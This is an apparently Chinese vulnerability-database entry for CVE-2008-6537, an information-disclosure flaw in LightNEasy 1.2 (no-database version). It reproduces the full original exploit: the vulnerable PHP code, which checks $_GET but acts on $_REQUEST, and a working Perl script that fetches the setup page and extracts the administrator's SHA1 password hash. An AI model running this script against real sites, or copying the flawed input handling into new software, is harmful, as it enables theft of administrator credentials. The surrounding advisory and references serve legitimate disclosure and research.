LightNEasy 'LightNEasy/lightneasy.php'信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114977 漏洞类型 信息泄露
发布时间 2008-04-10 更新时间 2009-03-29
CVE编号 CVE-2008-6537 CNNVD-ID CNNVD-200903-495
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/5425
https://www.securityfocus.com/bid/84502
https://cxsecurity.com/issue/WLB-2009040087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-495
|漏洞详情
LightNEasy是一款简单易用的内容管理系统(CMS)。LightNEasyNo数据库1.2版本的LightNEasy/lightneasy.php存在信息泄露漏洞。远程攻击者可以借助对LightNEasy.php的setup"do"操作,且它在$_GET已被情况但可通过运行$_REQUEST来访问,以获得管理员密码的杂乱信息。
|漏洞EXP
# Author:	__GiReX__
# mySite:	girex.altervista.org
# Date:		10/04/08

# CMS: 		LightNEasy 1.2 no database
# Site:		lightneasy.org

# Bug:		Hash Disclosure
# Exploit:	Remote Hash Retrieve


# Bug Explanation: LightNEasy/lightneasy.php

  if($_GET['do']!="login" && $_GET['do']!="sitemap" && $_SESSION[$set['password']] != "1") unset($_GET['do']);
  if($_POST['submit']!=$langmessage[120] && $_POST['submit']!=$langmessage[33] && $_SESSION[$set['password']] != "1")
	unset($_POST['submit']);

# $_GET['do'] is unset if we aren't admin or isn't login or sitemap

  function content() {
  ...
  switch($_REQUEST['do']) {
  ...
  case "setup": {
  ...
  <input type=\"hidden\" name=\"oldpassword\" value=\"".$set['password']."\" />

# content() diplays the HTML of the section passed with $_REQUEST['do']
# unset $_GET['do'] is not important if you switch the $_REQUEST one
# you can only see the admin's hash in hidden input and not edit it becouse $_POST['submit'] is unset


#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;

if(not defined $ARGV[0])
{
     banner();
     print "[-] Usage: perl $0 [host] [path]\n";
     print "[-] Example: perl $0 localhost /lightneasy/\n\n";
     exit;
}
my $client = new LWP::UserAgent or exit;

my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
   $target .=  $ARGV[1] unless not defined $ARGV[1];

banner();
my $response = $client->get($target . 'LightNEasy.php?do=setup');

if($response->is_success)
{
     if($response->as_string =~ /([a-f0-9]{40})/)
     {
	  print "[+] Admin's SHA1 Hash: $1 \n";
	  print "[+] Exploit Successfull\n";
     }
     else 
     {
	  print "[-] Unable to retrieve admin's hash\n";
	  print "[-] Exploit Failed\n";
     }
}
else
{
     print "[-] Unable to request ${target}LightNEasy.php?do=setup\n";
     print "[-] Exploit Failed\n";
}


sub banner
{
     print "[+] LightNEasy 1.2 no database Password Retrieve Exploit\n";
     print "[+] Coded by __GiReX__\n";
     print "\n";
}

# milw0rm.com [2008-04-10]
|受影响的产品
LightNEasy LightNEasy 1.2 No Database
|参考资料

来源:XF
名称:lightneasy-lightneasy-info-disclosure(41768)
链接:http://xforce.iss.net/xforce/xfdb/41768
来源:MILW0RM
名称:5425
链接:http://www.milw0rm.com/exploits/5425
来源:SECUNIA
名称:29757
链接:http://secunia.com/advisories/29757
来源:OSVDB
名称:44397
链接:http://osvdb.org/44397